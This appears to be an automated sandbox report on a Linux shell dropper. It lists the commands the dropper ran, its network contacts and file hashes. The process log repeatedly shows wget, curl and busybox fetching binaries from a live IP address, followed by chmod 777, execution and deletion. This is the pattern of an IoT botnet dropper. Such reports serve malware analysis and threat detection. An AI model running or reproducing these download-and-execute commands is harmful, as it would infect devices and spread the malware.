[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/rm
[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 03:52
Reported
2024-11-20 03:54
Platform
debian9-mipsel-20240611-en
Max time kernel
104s
Max time network
134s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
Processes
/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/wget
[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/chmod
[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/rm
[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/wget
[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/chmod
[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/rm
[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/chmod
[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/rm
[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/wget
[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/chmod
[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/rm
[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/chmod
[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/rm
[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/wget
[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/chmod
[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/rm
[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/wget
[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/chmod
[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/rm
[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/wget
[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/chmod
[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/rm
[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/wget
[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/chmod
[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/rm
[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/wget
[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/chmod
[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/rm
[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/wget
[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/chmod
[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/rm
[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/wget
[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/chmod
[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/rm
[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/wget
[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/chmod
[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/rm
[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |